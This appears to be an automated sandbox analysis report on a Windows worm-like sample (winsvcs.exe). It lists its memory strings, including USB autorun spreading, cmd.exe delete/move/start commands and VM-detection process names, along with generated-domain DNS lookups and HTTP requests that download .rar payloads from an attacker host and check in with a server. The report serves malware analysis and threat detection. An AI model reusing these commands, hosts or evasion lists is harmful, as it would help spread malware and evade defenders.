Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: winsvcs.exe	Binary or memory string: %ls\autorun.inf
Source: winsvcs.exe	Binary or memory string: [autorun] open=_\DeviceManager.exe UseAutoPlay=1
Source: winsvcs.exe	Binary or memory string: autorun.inf
Source: winsvcs.exe	Binary or memory string: [autorun]open=_\DeviceManager.exeUseAutoPlay=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco44
Source: winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
Source: winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s.exeo.exe\public_html\htdocs\httpdocs\wwwroot\ftproot\share\income\upload...Recycle.Bin.zip.rarWindows Archive Manager.exe.7zWindows Archive Manager.exe.tarWindows Archive Manager.exe.exe%temp%%ls\Windows Archive Manager.exe%windir%\system32\cmd.exe%ls*/c start _ & _\DeviceManager.exe & exit%ls\%s.lnk%ls.lnk%ls\_%ls\_\DeviceManager.exe%ls\autorun.infrbshell32.dllB:\shell32.dllB:\w[autorun]
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: [autorun]
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,	0_2_00402204
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_004032A4
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	1_2_006129E2
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,	6_2_004032A4
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,	6_2_00402204
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 10_2_006E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	10_2_006E29E2
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Code function: 15_2_001829E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	15_2_001829E2

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00402C41 memset,GetModuleFileNameW,Sleep,_wfopen,fseek,ftell,fclose,Sleep,memset,memset,GetLogicalDriveStringsW,GetDriveTypeW,SetErrorMode,GetVolumeInformationW,GetDriveTypeW,Sleep,

0_2_00402C41

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: fifiehsueuufidhfi.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: afeifieuuufufufuf.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fiiauediehduefuge.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srndndubsbsifurfd.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nousiieiffgogogoo.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iuirshriuisruruuf.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fiiauediehduefuge.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iuirshriuisruruuf.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noeuaoenriusfiruu.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eofihsishihiursgu.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fuaiuebndieufeufu.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eiifngjfksisiufjf.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: afeifieuuufufufuf.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eiifngjfksisiufjf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noeuaoenriusfiruu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: afeifieuuufufufuf.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nousiieiffgogogoo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nnososoosjfeuhueu.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fuaiuebndieufeufu.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noeuaoenriusfiruu.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nnososoosjfeuhueu.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssofhoseuegsgrfnj.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoroooskfogihisrg.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoroooskfogihisrg.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aiiaiafrzrueuedur.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srndndubsbsifurfd.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srndndubsbsifurfd.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fifiehsueuufidhfi.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoroooskfogihisrg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aiiaiafrzrueuedur.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iuirshriuisruruuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoroooskfogihisrg.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nnososoosjfeuhueu.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoroooskfogihisrg.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srndndubsbsifurfd.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eiifngjfksisiufjf.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssofhoseuegsgrfnj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eofihsishihiursgu.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fifiehsueuufidhfi.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fuaiuebndieufeufu.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: slpsrgpsrhojifdij.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fuaiuebndieufeufu.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aiiaiafrzrueuedur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fiiauediehduefuge.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: afeifieuuufufufuf.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nnososoosjfeuhueu.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fiiauediehduefuge.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nousiieiffgogogoo.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eiifngjfksisiufjf.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: slpsrgpsrhojifdij.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fuaiuebndieufeufu.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoroooskfogihisrg.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: slpsrgpsrhojifdij.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srndndubsbsifurfd.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fifiehsueuufidhfi.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aiiaiafrzrueuedur.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iuirshriuisruruuf.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nnososoosjfeuhueu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eofihsishihiursgu.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nousiieiffgogogoo.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iuirshriuisruruuf.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: slpsrgpsrhojifdij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fiiauediehduefuge.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noeuaoenriusfiruu.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: noeuaoenriusfiruu.su replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: srndndubsbsifurfd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eofihsishihiursgu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nousiieiffgogogoo.ru replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eofihsishihiursgu.in replaycode: Name error (3)

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 799

Source: unknown

Network traffic detected: DNS query count 91

Source: global traffic

TCP traffic: 192.168.2.6:49722 -> 44.221.84.105:799

Source: Joe Sandbox View	IP Address: 185.215.113.66 185.215.113.66
Source: Joe Sandbox View	IP Address: 208.100.26.245 208.100.26.245

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ssofhoseuegsgrfnu.ru
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: ww88.ssofhoseuegsgrfnu.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tldr.php?newinf=1 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0Host: 92.63.197.48
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
